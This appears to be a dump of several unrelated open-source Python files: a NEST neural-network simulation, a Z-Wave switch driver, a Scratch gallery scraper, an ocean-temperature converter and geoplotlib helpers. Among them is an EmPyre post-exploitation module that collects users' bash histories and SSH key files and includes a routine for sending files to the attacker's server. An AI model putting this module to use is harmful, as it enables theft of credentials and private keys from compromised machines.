                      "overwrite_files": True})
print("Building network")
###############################################################################
# Configuration of the model ``iaf_psc_delta`` and ``poisson_generator`` using
# ``SetDefaults``. This function expects the model to be the inserted as a
# string and the parameter to be specified in a dictionary. All instances of
# theses models created after this point will have the properties specified
# in the dictionary by default.
nest.SetDefaults("iaf_psc_delta", neuron_params)
nest.SetDefaults("poisson_generator", {"rate": p_rate})
###############################################################################
# Creation of the nodes using ``Create``. We store the returned handles in
# variables for later reference. Here the excitatory and inhibitory, as well
# as the poisson generator and two spike detectors. The spike detectors will
# later be used to record excitatory and inhibitory spikes.
nodes_ex = nest.Create("iaf_psc_delta", NE)
nodes_in = nest.Create("iaf_psc_delta", NI)
noise = nest.Create("poisson_generator")
espikes = nest.Create("spike_detector")
ispikes = nest.Create("spike_detector")
###############################################################################
# Configuration of the spike detectors recording excitatory and inhibitory
# spikes by sending parameter dictionaries to ``set``. Setting the property
# `record_to` to *"ascii"* ensures that the spikes will be recorded to a file,
# whose name starts with the string assigned to the property `label`.
espikes.set(label="brunel-py-ex", record_to="ascii")
ispikes.set(label="brunel-py-in", record_to="ascii")
print("Connecting devices")
###############################################################################
# Definition of a synapse using ``CopyModel``, which expects the model name of
# a pre-defined synapse, the name of the customary synapse and an optional
# parameter dictionary. The parameters defined in the dictionary will be the
# default parameter for the customary synapse. Here we define one synapse for
# the excitatory and one for the inhibitory connections giving the
# previously defined weights and equal delays.
nest.CopyModel("static_synapse", "excitatory",
               {"weight": J_ex, "delay": delay})
nest.CopyModel("static_synapse", "inhibitory",
               {"weight": J_in, "delay": delay})
###############################################################################
# Connecting the previously defined poisson generator to the excitatory and
# inhibitory neurons using the excitatory synapse. Since the poisson
# generator is connected to all neurons in the population the default rule
# (# ``all_to_all``) of ``Connect`` is used. The synaptic properties are inserted
# via ``syn_spec`` which expects a dictionary when defining multiple variables
# or a string when simply using a pre-defined synapse.
nest.Connect(noise, nodes_ex, syn_spec="excitatory")
nest.Connect(noise, nodes_in, syn_spec="excitatory")
###############################################################################
# Connecting the first ``N_rec`` nodes of the excitatory and inhibitory
# population to the associated spike detectors using excitatory synapses.
# Here the same shortcut for the specification of the synapse as defined
# above is used.
nest.Connect(nodes_ex[:N_rec], espikes, syn_spec="excitatory")
nest.Connect(nodes_in[:N_rec], ispikes, syn_spec="excitatory")
print("Connecting network")
print("Excitatory connections")
###############################################################################
# Connecting the excitatory population to all neurons using the pre-defined
# excitatory synapse. Beforehand, the connection parameters are defined in a
# dictionary. Here we use the connection rule ``fixed_indegree``,
# which requires the definition of the indegree. Since the synapse
# specification is reduced to assigning the pre-defined excitatory synapse it
# suffices to insert a string.
conn_params_ex = {'rule': 'fixed_indegree', 'indegree': CE}
nest.Connect(nodes_ex, nodes_ex + nodes_in, conn_params_ex, "excitatory")
print("Inhibitory connections")
###############################################################################
# Connecting the inhibitory population to all neurons using the pre-defined
# inhibitory synapse. The connection parameters as well as the synapse
# parameters are defined analogously to the connection from the excitatory
# population defined above.
conn_params_in = {'rule': 'fixed_indegree', 'indegree': CI}
nest.Connect(nodes_in, nodes_ex + nodes_in, conn_params_in, "inhibitory")
###############################################################################
# Storage of the time point after the buildup of the network in a variable.
endbuild = time.time()
###############################################################################
# Simulation of the network.
print("Simulating")
nest.Simulate(simtime)
###############################################################################
# Storage of the time point after the simulation of the network in a variable.
endsimulate = time.time()
###############################################################################
# Reading out the total number of spikes received from the spike detector
# connected to the excitatory population and the inhibitory population.
events_ex = espikes.n_events
events_in = ispikes.n_events
###############################################################################
# Calculation of the average firing rate of the excitatory and the inhibitory
# neurons by dividing the total number of recorded spikes by the number of
# neurons recorded from and the simulation time. The multiplication by 1000.0
# converts the unit 1/ms to 1/s=Hz.
rate_ex = events_ex / simtime * 1000.0 / N_rec
rate_in = events_in / simtime * 1000.0 / N_rec
###############################################################################
# Reading out the number of connections established using the excitatory and
# inhibitory synapse model. The numbers are summed up resulting in the total
# number of synapses.
num_synapses = (nest.GetDefaults("excitatory")["num_connections"] +
                nest.GetDefaults("inhibitory")["num_connections"])
###############################################################################
# Establishing the time it took to build and simulate the network by taking
# the difference of the pre-defined time variables.
build_time = endbuild - startbuild
sim_time = endsimulate - endbuild
###############################################################################
# Printing the network properties, firing rates and building times.
# NOTE(review): "Exitatory" below is a typo for "Excitatory" in the output
# label (left untouched here because it is a runtime string).
print("Brunel network simulation (Python)")
print("Number of neurons : {0}".format(N_neurons))
print("Number of synapses: {0}".format(num_synapses))
print(" Exitatory : {0}".format(int(CE * N_neurons) + N_neurons))
print(" Inhibitory : {0}".format(int(CI * N_neurons)))
print("Excitatory rate : %.2f Hz" % rate_ex)
print("Inhibitory rate : %.2f Hz" % rate_in)
print("Building time : %.2f s" % build_time)
print("Simulation time : %.2f s" % sim_time)
###############################################################################
# Plot a raster of the excitatory neurons and a histogram.
nest.raster_plot.from_device(espikes, hist=True)
plt.show()
| espenhgn/nest-simulator | pynest/examples/brunel_delta_nest.py | Python | gpl-2.0 | 12,068 | [
"NEURON"
] | 4ce930317ac307bce4fb23f8d4f52bc34c9052f5fc1f3b20c95121ac26caa8e3 |
from Firefly import logging
from Firefly.components.zwave.device_types.switch import ZwaveSwitch
from Firefly.const import ACTION_OFF, ACTION_ON, SWITCH
from Firefly.services.alexa.alexa_const import ALEXA_SMARTPLUG
# Device metadata and the Firefly attribute names this component exposes.
TITLE = 'Aeotec Smart Switch 6'
BATTERY = 'battery'
ALARM = 'alarm'
POWER_METER = 'power_meter'
VOLTAGE_METER = 'voltage_meter'
CURRENT = 'power_current'
CURRENT_ENERGY_READING = 'current_energy_reading'
PREVIOUS_ENERGY_READING = 'previous_energy_reading'
VOLTAGE = 'voltage'
WATTS = 'watts'
# Commands the switch accepts and values that can be requested from it.
COMMANDS = [ACTION_OFF, ACTION_ON]
REQUESTS = [SWITCH, CURRENT, VOLTAGE, WATTS]
INITIAL_VALUES = {}
# Capability flags advertised to the Firefly core.
CAPABILITIES = {
  POWER_METER: True,
  SWITCH: True,
}
def Setup(firefly, package, **kwargs):
    """Create the Aeotec Smart Switch 6 component and register it with Firefly."""
    logging.message('Entering %s setup' % TITLE)
    return firefly.install_component(ZwaveAeotecSwitch6(firefly, package, **kwargs))
class ZwaveAeotecSwitch6(ZwaveSwitch):
    """Z-Wave switch component for the Aeotec Smart Switch 6 (ZW096)."""

    def __init__(self, firefly, package, **kwargs):
        # Merge caller-supplied initial values on top of the module defaults
        # without mutating the shared INITIAL_VALUES dict.
        initial_values = INITIAL_VALUES
        if kwargs.get('initial_values') is not None:
            initial_values_updated = INITIAL_VALUES.copy()
            initial_values_updated.update(kwargs.get('initial_values'))
            initial_values = initial_values_updated
        kwargs.update({
      'initial_values': initial_values,
      'commands': COMMANDS,
      'requests': REQUESTS
        })
        super().__init__(firefly, package, TITLE, capabilities=CAPABILITIES, **kwargs)
        self.set_alexa_categories(ALEXA_SMARTPLUG)

    def update_device_config(self, **kwargs):
        # TODO: Pull these out into config values
        # TODO Copy this retry logic to all zwave devices
        """
        Updated the devices to the desired config params. This will be useful to make new default devices configs.
        For example when there is a gen6 multisensor I want it to always report every 5 minutes and timeout to be 30
        seconds.
        Args:
          **kwargs ():
        """
        # Spec Sheet
        # TODO: Find spec sheet
        # TODO: Document These
        report = 2 # 1=hail 2=basic
        # Push the desired parameter set to the device; verify_set_zwave_params
        # returns whether every (param, value) pair was confirmed.
        successful = self.verify_set_zwave_params([
      (110, 1),
      (100, 1),
      (80, report),
      (102, 15),
      (111, 30)
        ])
        self._update_try_count += 1
        self._config_updated = successful
| Firefly-Automation/Firefly | Firefly/components/zwave/aeotec/zw096_smart_switch_6.py | Python | apache-2.0 | 2,215 | [
"Firefly"
] | 404335b3b164d45c3aba92924918eabc328971cc2c586dfb3ed766854dc8914d |
import sys
# Presumably the Python 2 branch is the web-server (CGI) deployment — note
# the absolute server path — while Python 3 is local use; confirm.
if sys.version_info < (3,0):
    from urllib import urlopen
    fileHeader = "/user/schafer/web/outreach/dojo/"
else:
    from urllib.request import urlopen
    fileHeader = "../"
# Scratch accounts excluded from the progress tables.
exclusionList = ["CVCoderDojo","jbschafer","uniscratch"]
# Accounts whose comment on a project marks it as mentor-approved.
approvalList = ["CVCoderDojo","jbschafer","uniscratch","crogersaea267"]
website = "http://www.cs.uni.edu/~schafer/outreach/dojo/"
#columnsVisible = 3
maxShown = 4 # max project icons shown per user/assignment cell
newCount = 10 # projects newer than this many days are flagged "new"
#mode 0=all from files (For HTML development purposes)
#mode 1=update gallery list only (Only needed if new materials have been added to curriculum)
#       This mode requires some additional manual intervention of
#       gallery list file after the fact
#mode 2=update user submission lists only (Most common mode on website)
#mode 3=update both gallery and user submission lists
def generatePages(mode=0):
    """Regenerate the CoderDojo progress pages.

    mode 0: rebuild pages from cached files only (HTML development).
    mode 1: re-scrape the gallery index (needs manual post-editing).
    mode 2: re-scrape per-gallery submission lists (common website mode).
    mode 3: do both 1 and 2.
    """
    # Get Gallery List
    if mode==1 or mode==3:
        print("Updating Gallery List")
        parseAllGalleries()
        print("Do not forget to manually order and add instruction links")
    print("Reading in Gallery List")
    galleries = []
    lines = []
    # The index file holds one "id|name|instructions" record per gallery;
    # galleries whose name contains "Debug" are ignored.  Using ``with``
    # guarantees the file handle is closed (it previously relied on a
    # manual close that would be skipped on error).
    with open(fileHeader+"scripts/galleryIndex.txt","r") as fin:
        for line in fin:
            if line.find("|")>-1:
                toks = line.split("|")
                if toks[1].find("Debug")==-1:
                    galleries.append(int(toks[0]))
                    lines.append(line)
    print(str(len(galleries))+" galleries found")
    # If necessary, scrape each gallery website again for user activity.
    if mode==2 or mode==3:
        print("Updating submission lists for galleries ")
        for gid in galleries:
            galleryIDScrape(gid)
    # Generate results tables (HTML variant kept for reference).
    #createHTMLTables(galleries,lines)
    createWIKITables(galleries,lines)
def createHTMLTables(galleries,lines):
    """Write one static HTML progress page per level from the cached
    per-gallery files.  *galleries* is a list of studio ids; *lines* the raw
    "id|name|instructions" index records."""
    from datetime import datetime
    from datetime import timedelta
    current=str(datetime.now())
    tdelta = timedelta(days=newCount)
    #Read through the gallery files to make a list of users present
    allUsers = {}
    users = []
    for gid in galleries:
        # NOTE(review): these per-gallery handles are never closed.
        fin = open(fileHeader+"scripts/"+str(gid)+".txt","r")
        for line in fin:
            toks = line.split("|")
            uid = toks[0]
            pid = toks[1]
            discovered = toks[2]
            comments = toks[3]
            if not uid in exclusionList:
                #pid=pid[:-1]
                if not uid in allUsers:
                    allUsers[uid]=[]
                    users.append(uid)
                allUsers[uid].append((gid,pid,discovered,comments))
    users = sorted(users, key=str.lower)
    #determine how many levels/pages to create
    levels = []
    for item in lines:
        gid,gname,ginst=item.split("|")
        where = ginst.find(":")
        level = ginst[:where]
        if not level in levels:
            levels.append(level)
    levels = sorted(levels,key=str.lower)
    for lev in levels:
        #build single webpage
        web = open(fileHeader+"scripts/projects_"+str(lev)+".html","w")
        web.write("""<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Cedar Valley CoderDojo</title>
</head>
<body>
<h1>CV CoderDojo Ninja Projects Level """)
        web.write(str(lev[3:]))
        web.write("</h1>\n")
        web.write("""<p>Click on a link below to view projects from another level.
<ul>\n""")
        for others in levels:
            web.write('<li><a href="projects_'+str(others)+'.html">Level '+others[3:]+'</a></li>\n')
        web.write("""</ul>
<p>Clicking on an icon in the table will take you to that Ninja's project.
<table border="2">
  <tbody>
    <tr>
      <th scope="col"> </th>\n""")
        # One column header per assignment of this level.
        for item in lines:
            gid,gname,ginst=item.split("|")
            if ginst.find(lev)>-1:
                where = gname.find(" - ")
                web.write(' <th scope="col">')
                web.write(gname[where+3:]+'<p>\n')
                # NOTE(review): ginst still carries its trailing newline here
                # (the WIKI variant strips it with ginst[:-1]) — confirm.
                web.write('<a href="'+website+'doku.php?id='+ginst+'/">')
                web.write("Instructions")
                web.write('</a><p>\n')
                web.write('<a href="http://scratch.mit.edu/studios/'+gid+'/">')
                web.write("Project Gallery")
                web.write('</a>\n')
        web.write("</tr>\n")
        # One row per Ninja: an icon per matching submission.
        for uid in users:
            web.write(" <tr>\n")
            web.write(' <th align="left" scope="row">')
            web.write('<a href="http://scratch.mit.edu/users/'+uid+'/">'+uid)
            web.write('</a></th>\n')
            for item in lines:
                gid,gname,ginst=item.split("|")
                #print(gid)
                if ginst.find(lev)>-1:
                    count=0
                    web.write(" <td>")
                    for tup in allUsers[uid]:
                        if gid==str(tup[0]):
                            if count<maxShown:
                                web.write('<a href="http://scratch.mit.edu/projects/'+str(tup[1])+'/">')
                                # app/unapp = mentor-approved or awaiting.
                                if tup[3]=="COMMENTS\n":
                                    exist="app"
                                else:
                                    exist="unapp"
                                # new/exist = discovered within newCount days.
                                cur=datetime.strptime(current[:current.find(".")], '%Y-%m-%d %H:%M:%S')
                                older=datetime.strptime(tup[2][:tup[2].find(".")], '%Y-%m-%d %H:%M:%S')
                                diff = cur-older
                                if (diff>tdelta):
                                    when="exist"
                                else:
                                    when="new"
                                web.write('<img src="'+when+"_"+exist+'.png">')
                                web.write('</a>')
                            elif count==maxShown:
                                web.write(" plus more!")
                            count+=1
                    if count==0:
                        web.write('<img src="blank.png">')
                    web.write(' </td>\n')
        # NOTE(review): this single </tr> sits outside the user loop, so the
        # per-user rows are never individually closed; browsers tolerate
        # this, but it looks unintended — confirm.
        web.write(" </tr>")
        web.write(""" </tbody>
</table>
""")
        web.write("<p>This table last updated: ")
        current=str(datetime.now())
        bp = current.find(".")
        web.write(current[:bp])
        web.write('<a href="scratchScrape.cgi">.</a>')
        web.write("""</p>
<p> </p>
<p> </p>
</body>
</html>""")
        web.close()
def createWIKITables(galleries,lines):
    """Write one DokuWiki progress page per level from the cached
    per-gallery files.  *galleries* is a list of studio ids; *lines* the raw
    "id|name|instructions" index records."""
    from datetime import datetime
    from datetime import timedelta
    current=str(datetime.now())
    tdelta = timedelta(days=newCount)
    #Read through the gallery files to make a list of users present
    allUsers = {}
    users = []
    for gid in galleries:
        # NOTE(review): these per-gallery handles are never closed.
        fin = open(fileHeader+"scripts/"+str(gid)+".txt","r")
        for line in fin:
            toks = line.split("|")
            uid = toks[0]
            pid = toks[1]
            discovered = toks[2]
            comments = toks[3]
            if not uid in exclusionList:
                #pid=pid[:-1]
                if not uid in allUsers:
                    allUsers[uid]=[]
                    users.append(uid)
                allUsers[uid].append((gid,pid,discovered,comments))
    users = sorted(users, key=str.lower)
    #determine how many levels/pages to create
    levels = []
    for item in lines:
        gid,gname,ginst=item.split("|")
        where = ginst.find(":")
        level = ginst[:where]
        if not level in levels:
            levels.append(level)
    levels = sorted(levels,key=str.lower)
    for lev in levels:
        #build single webpage
        web = open(fileHeader+"/data/pages/progress/projects_"+str(lev)+".txt","w")
        web.write("""====== CV CoderDojo Ninja Projects Level """)
        web.write(str(lev[3:]))
        web.write(" ======\n")
        web.write("""Click on a link below to view projects from another level.\n""")
        for others in levels:
            web.write(' * [[projects_'+str(others)+'|Level '+others[3:]+']]\n')
        web.write("""\n\nClicking on an icon in the table will take you to that Ninja's project.
\n\n| ^""")
        # One column header per assignment of this level (ginst[:-1] strips
        # the record's trailing newline).
        for item in lines:
            gid,gname,ginst=item.split("|")
            if ginst.find(lev)>-1:
                where = gname.find(" - ")
                web.write(gname[where+3:]) #Assignment Name
                web.write(' [['+ginst[:-1]+'|Instructions]]') #Instruction Link
                web.write(' [[http://scratch.mit.edu/studios/'+gid+'/|ProjectGallery]]') #GalleryLink
                web.write(' ^')
        web.write("\n")
        # One table row per Ninja: an icon per matching submission.
        for uid in users:
            web.write('^ [[http://scratch.mit.edu/users/'+uid+'/|'+uid+']]')
            for item in lines:
                gid,gname,ginst=item.split("|")
                if ginst.find(lev)>-1:
                    count=0
                    web.write(" | ")
                    for tup in allUsers[uid]:
                        if gid==str(tup[0]):
                            if count<maxShown:
                                # app/unapp = mentor-approved or awaiting.
                                if tup[3]=="COMMENTS\n":
                                    exist="app"
                                else:
                                    exist="unapp"
                                # new/exist = discovered within newCount days.
                                cur=datetime.strptime(current[:current.find(".")], '%Y-%m-%d %H:%M:%S')
                                older=datetime.strptime(tup[2][:tup[2].find(".")], '%Y-%m-%d %H:%M:%S')
                                diff = cur-older
                                if (diff>tdelta):
                                    when="exist"
                                else:
                                    when="new"
                                web.write('[[http://scratch.mit.edu/projects/'+str(tup[1])+'/|')
                                web.write('{{..:'+when+"_"+exist+'.png|}}]] ')
                            elif count==maxShown:
                                web.write(" plus more!")
                            count+=1
                    #if count==0:
                        #web.write('{{..:blank.png|}}')
                    web.write(" | \n")
        web.write("This table last updated: ")
        current=str(datetime.now())
        bp = current.find(".")
        web.write(current[:bp])
        web.close()
#This gets run in mode 2 or 3. It is used to visit the Scratch website for the given studio
#And it rebuilds the local text file representing what projects are in the studio,
#if they are "new" or not, and if they have been commented on by dojo mentors.
def galleryIDScrape(studio):
    """Rebuild the local text file describing one Scratch studio.

    Each line of the file is "uid|pid|timestamp|status".  Previously
    recorded AWAITING entries are upgraded to COMMENTS once a mentor from
    approvalList has commented on the project, and any project newly
    found in the studio is appended with status AWAITING.

    Relies on module-level names: fileHeader, urlopen, approvalList.
    """
    from datetime import datetime
    current = str(datetime.now())
    fname = "scripts/" + str(studio) + ".txt"
    # begin by checking contents of existing studio file so that
    # we don't waste time rechecking already checked in projects
    import os.path
    existing = []
    if os.path.isfile(fileHeader + fname):
        # FIX: the original opened `fin` and never closed it; a context
        # manager guarantees the handle is released.
        with open(fileHeader + fname, "r") as fin:
            for rec in fin:
                existing.append(rec)
    # Now update this data by checking to see if any of the non-approved
    # projects are now approved
    for index in range(len(existing)):
        rec = existing[index]
        if rec.find("AWAITING") > -1:
            toks = rec.split("|")
            if len(toks) != 4:
                # malformed record -- keep going, but make it visible
                print("OOPS")
            project = toks[1]
            aResp = urlopen("http://scratch.mit.edu/site-api/comments/project/" + str(project))
            webPg = str(aResp.read())
            # a comment by any approved mentor marks the project approved
            for admin in approvalList:
                if webPg.find("users/" + admin) > -1:
                    toks[3] = "COMMENTS\n"
                    existing[index] = "|".join(toks)
    # Check the Scratch gallery for new entries
    aResp = urlopen("http://scratch.mit.edu/site-api/projects/in/" + str(studio) + "/1/")
    webPg = str(aResp.read())
    tokens = webPg.split('data-id="')
    for v in tokens[1:]:
        end = v.find('"')
        pid = v[:end]
        v2 = v.split("/users/")
        end = v2[1].find("/")
        uid = v2[1][:end]
        # only append (uid, pid) pairs we have not seen before
        found = False
        for rec in existing:
            if rec.find(pid) > -1 and rec.find(uid) > -1:
                found = True
        if not found:
            line = uid + "|" + pid + "|" + str(current) + "|AWAITING\n"
            existing.append(line)
    # now rewrite the whole file
    with open(fileHeader + fname, "w") as fout:
        for line in existing:
            fout.write(line)
def parseAllGalleries():
    """Synchronise the local gallery index with the Scratch website.

    Reads known gallery ids from scripts/galleryIndex.txt, scrapes the
    galleries owned or curated by CVCoderDojo, and appends any new
    (id, title) pairs to the index file.
    """
    # This assumes that the galleryIndex exists and works
    # in "updating" mode.
    fin = open(fileHeader + "scripts/galleryIndex.txt", "r")
    existing = []   # gallery ids already in the local index
    lines = []      # raw index lines, preserved in original order
    for line in fin:
        if line.find("|") > -1:
            toks = line.split("|")
            existing.append(int(toks[0]))
            lines.append(line)
    fin.close()
    print("We already knew about " + str(len(existing)) + " galleries.")
    # Now see what is on the website
    aResp = urlopen("http://scratch.mit.edu/site-api/galleries/owned_or_curated_by/CVCoderDojo/")
    webPg = str(aResp.read())
    # the site-api returns JSON-ish text; "}}}," separates gallery records
    gals = webPg.split("}}},")
    print(str(len(gals)) + " galleries located on scratch website")
    if (len(existing) < len(gals)):
        # This means there are new galleries to add to the list
        print("That means we have to update the list")
        # First, print the old part of the file in current order
        # NOTE(review): the index was read from fileHeader+"scripts/galleryIndex.txt"
        # but is rewritten to fileHeader+"galleryIndex.txt" (no "scripts/" prefix).
        # This looks like a bug -- confirm the intended output path.
        fout = open(fileHeader + "galleryIndex.txt", "w")
        for x in lines:
            fout.write(x)
        # Now, find all of the current galleries not already in the file
        newGals = []
        for g in gals:
            # pull the numeric id: the text after the first ": " up to the comma
            colon = g.find(":")
            comma = g.find(",", colon)
            sid = g[colon+2:comma]
            # pull the title: the quoted value after '"title": "'
            titleTag = g.find('"title": "')
            quote = g.find('"', titleTag + 11)
            title = g[titleTag+10:quote]
            if (not (int(sid) in existing)):
                newGals.append((sid, title))
        print("Reality check. I found " + str(len(newGals)) + " new galleries.")
        newGals.sort()
        for g in newGals:
            sid, title = g
            fout.write(sid + "|" + title + "\n")
        fout.close()
    else:
        print("Current File was up to date")
# Module-level side effect: regenerate the progress pages (mode 2 = update).
generatePages(2)
| jbschafer/LearningLabServer | scripts/updateProgress.py | Python | gpl-2.0 | 14,443 | [
"VisIt"
] | 932fac06616a82b2bd744f7a214870e0c214f46860600d12dd504d7745715a3c |
#!/usr/bin/env python

# L. Brodeau, 2015

# Potential temperature to conservative temperature (TEOS 10)
#
# Usage: convert_pt_to_CT.py <Temperature_file> <temp_var> <Salinity_file> <sal_var>
# Copies the temperature file and overwrites the temperature variable in the
# copy with conservative temperature computed by gsw.CT_from_pt().
#
# NOTE: this is Python 2 code (`print` statements, `string.replace`).

import sys
import os
import numpy as nmp
from netCDF4 import Dataset
from string import replace

import gsw

if len(sys.argv) != 5:
    print 'Usage: '+sys.argv[0]+' <Temperature_file_to_convert> <temperature_name> <Absolute_salinity_file> <salinity_name>'
    sys.exit(0)

cf_temp = sys.argv[1]   # input potential-temperature file
cv_temp = sys.argv[2]   # name of the temperature variable
cf_sal = sys.argv[3]    # absolute-salinity file (same grid/records)
cv_sal = sys.argv[4]    # name of the salinity variable

# output name: temperature variable name tagged with _TEOS10
cf_out = replace(cf_temp, cv_temp, cv_temp+'_TEOS10')

# work on a fresh copy of the input file, then edit it in place
os.system('rm -f '+cf_out)
os.system('cp '+cf_temp+' '+cf_out)

print '\n'

f_sal = Dataset(cf_sal)     # r+ => can read and write in the file... )
vcdim = f_sal.variables[cv_sal].dimensions
# by convention the first dimension of the variable is the record (time) axis
cv_t = vcdim[0]; print ' *** record dimension is called "'+cv_t+'"'
Nt = f_sal.dimensions[cv_t].size ; print ' *** There are '+str(Nt)+' time records...\n'

# Inquire the shape of arrays:
nb_dim = len(vcdim)
print ' *** '+cf_sal+' has '+str(nb_dim)+' dimmensions!'
if not nb_dim in [ 2, 3, 4 ]: print ' ERROR: unsupported number of dimmensions! =>', nb_dim ; sys.exit(0)

# Opening the Netcdf output file:
f_out = Dataset(cf_out, 'r+')   # r+ => can read and write in the file... )
print 'File ', cf_out, 'is open...\n'

# Convert record by record to keep memory usage bounded
for jt in range(Nt):

    print '\n --- treating record # '+str(jt)

    # salinity slice for this record (slicing depends on the variable rank)
    if nb_dim==4: xsal = f_sal.variables[cv_sal][jt,:,:,:]
    if nb_dim==3: xsal = f_sal.variables[cv_sal][jt,:,:]
    if nb_dim==2: xsal = f_sal.variables[cv_sal][jt,:]

    # Extracting tmask at surface level:
    # overwrite potential temperature with conservative temperature in place
    if nb_dim==4:
        xtemp = f_out.variables[cv_temp][jt,:,:,:]
        f_out.variables[cv_temp][jt,:,:,:] = gsw.CT_from_pt(xsal, xtemp)
    if nb_dim==3:
        xtemp = f_out.variables[cv_temp][jt,:,:]
        f_out.variables[cv_temp][jt,:,:] = gsw.CT_from_pt(xsal, xtemp)
    if nb_dim==2:
        xtemp = f_out.variables[cv_temp][jt,:]
        f_out.variables[cv_temp][jt,:] = gsw.CT_from_pt(xsal, xtemp)

f_out.variables[cv_temp].long_name = 'Conservative Temperature (TEOS10) built from potential temperature'

f_sal.close()
f_out.close()

print cf_out+' sucessfully created!'
| brodeau/barakuda | python/exec/convert_pt_to_CT.py | Python | gpl-2.0 | 2,140 | [
"NetCDF"
] | ccac1e465c24bc090c0d62cc97691b01d7e9ead8da2761d3bb3d85ee7b7d620b |
class Module:
    """EmPyre post-exploitation module: pillage the current (or every)
    user's home directory for bash history and .ssh files."""

    def __init__(self, mainMenu, params=None):
        """
        mainMenu -- main menu object, kept for access to external
                    functionality (listeners/agent handlers/etc.)
        params   -- optional list of (option_name, value) pairs used to
                    pre-populate self.options (e.g. from the command line).
                    FIX: the original default was a mutable `[]` (shared
                    across calls); `None` is the safe sentinel.
        """

        # metadata info about the module, not modified during runtime
        self.info = {
            # name for the module that will appear in module menus
            'Name': 'Linux PillageUser',

            # list of one or more authors for the module
            'Author': ['@harmj0y'],

            # more verbose multi-line description of the module
            'Description': ("Pillages the current user for their bash_history, ssh known hosts, "
                            "recent folders, etc. "),

            # True if the module needs to run in the background
            'Background' : False,

            # File extension to save the file as
            'OutputExtension' : "",

            # if the module needs administrative privileges
            'NeedsAdmin' : False,

            # True if the method doesn't touch disk/is reasonably opsec safe
            'OpsecSafe' : True,

            # list of any references/other comments
            'Comments': []
        }

        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent' : {
                # The 'Agent' option is the only one that MUST be in a module
                'Description'   :   'Agent to execute module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Sleep' : {
                'Description'   :   "Switch. Sleep the agent's normal interval between downloads, otherwise use one blast.",
                'Required'      :   False,
                'Value'         :   'True'
            },
            'AllUsers' : {
                'Description'   :   "Switch. Run for all users (needs root privileges!)",
                'Required'      :   False,
                'Value'         :   'False'
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        #   like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        # During instantiation, any settable option parameters
        # are passed as an object set to the module and the
        # options dictionary is automatically set. This is mostly
        # in case options are passed on the command line
        if params:
            for param in params:
                # parameter format is [Name, Value]
                option, value = param
                if option in self.options:
                    self.options[option]['Value'] = value

    def generate(self):
        """Build and return the Python source executed by the agent.

        The '%(sleep)s' / '%(allUsers)s' placeholders are substituted with
        the current option values; '%%' sequences survive substitution as
        literal '%' characters in the agent script.
        """

        sleep = self.options['Sleep']['Value']
        allUsers = self.options['AllUsers']['Value']

        script = """
import os

# custom function to send downloac packets back
def downloadFile(path):
    import os
    filePath = os.path.expanduser(path)

    if os.path.isfile(filePath):

        offset = 0
        size = os.path.getsize(filePath)

        while True:
            partIndex = 0

            # get 512kb of the given file starting at the specified offset
            encodedPart = get_file_part(filePath, offset)
            partData = "%%s|%%s|%%s" %%(partIndex, filePath, encodedPart)
            if not encodedPart or encodedPart == '': break
            sendMessage(encodePacket(41, partData))

            # if we're choosing to sleep between file part downloads
            if "%(sleep)s".lower() == "true":
                global minSleep
                global maxSleep
                minSleep = (1.0-jitter)*delay
                maxSleep = (1.0+jitter)*delay
                sleepTime = random.randint(minSleep, maxSleep)
                time.sleep(sleepTime)

            partIndex += 1
            offset += 5120000

searchPaths = ['/.bash_history']

if "%(allUsers)s".lower() == "true":
    d='/home/'
    userPaths = [os.path.join(d,o) for o in os.listdir(d) if os.path.isdir(os.path.join(d,o))]
    userPaths += ["/root/"]
else:
    userPaths = ['~/']

for userPath in userPaths:

    for searchPath in searchPaths:
        #downloadFile(userPath + searchPath)
        print userPath + searchPath

    # grab all .ssh files
    filePath = os.path.expanduser(userPath + '/.ssh/')
    if os.path.exists(filePath):
        sshFiles = [f for f in os.listdir(filePath) if os.path.isfile(os.path.join(filePath, f))]
        for sshFile in sshFiles:
            # downloadFile(userPath + '/.ssh/' + sshFile)
            print userPath + '/.ssh/' + sshFile

print "pillaging complete"
""" % {'sleep': sleep, 'allUsers': allUsers}

        return script
| EmpireProject/EmPyre | lib/modules/collection/linux/pillage_user.py | Python | bsd-3-clause | 4,805 | [
"BLAST"
] | 2a8f6a7780a625f58bceef04d1bd8ce68828c44ca559e99ed08eaed8577b8c4f |
import base64
import traceback
import pyglet
from geoplotlib.core import GeoplotlibApp
from core import FONT_NAME
class AppConfig:
    """Mutable container for the global geoplotlib configuration.

    A single module-level instance is shared by all the top-level
    functions in this module; reset() restores the defaults.
    """

    def __init__(self):
        self.reset()

    def reset(self):
        """Restore every setting to its default value."""
        self.layers = []                  # BaseLayer objects to render
        self.bbox = None                  # initial BoundingBox, or None
        self.savefig = None               # screenshot filename, or None
        self.tiles_provider = 'positron'  # map tile source
        self.smoothing = False            # OpenGL line antialiasing
        self.map_alpha = 255              # tile brightness (0-255)
        # default window: 90% of the primary screen in each dimension
        screen = pyglet.canvas.get_display().get_default_screen()
        self.screen_w = int(screen.width * .9)
        self.screen_h = int(screen.height * .9)
        self.requested_zoom = None        # explicit zoom level, or None
_global_config = AppConfig()
def _runapp(app_config):
    """Run a GeoplotlibApp with the given configuration.

    Any exception raised while the app is running is printed and
    swallowed; the window is always closed and the global configuration
    reset afterwards.
    """
    app = GeoplotlibApp(app_config)
    try:
        app.start()
    except BaseException:
        # FIX: was a bare `except:`. `BaseException` keeps the identical
        # catch-everything behavior (including KeyboardInterrupt) while
        # being explicit and lint-clean.
        traceback.print_exc()
    finally:
        app.close()
    _global_config.reset()
def show():
    """Launch the geoplotlib window with all layers registered so far.

    Blocks until the window is closed; the global configuration is then
    reset (inside _runapp).
    """
    _runapp(_global_config)
def savefig(fname):
    """Launch geoplotlib, save a screenshot and terminate.

    :param fname: output filename stem (the screenshot is apparently
        written as fname + '.png' -- see how `inline` looks it up;
        confirm against GeoplotlibApp)
    """
    _global_config.savefig = fname
    _runapp(_global_config)
def inline(width=900):
    """Display the map inline in an IPython/Jupyter notebook.

    Renders the current layers to a uniquely-named temporary png,
    embeds it as a base64 data-URI <img>, then deletes the file.

    :param width: image width in pixels for the browser
    """
    # FIX: removed unused `Image` and `clear_output` imports, and import
    # `urllib.parse` explicitly -- on Python 3 `import urllib` alone does
    # not guarantee the `parse` submodule is loaded.
    from IPython.display import HTML, display
    import random
    import string
    import urllib.parse
    import os

    # pick a random 32-char name that does not collide with an existing png
    while True:
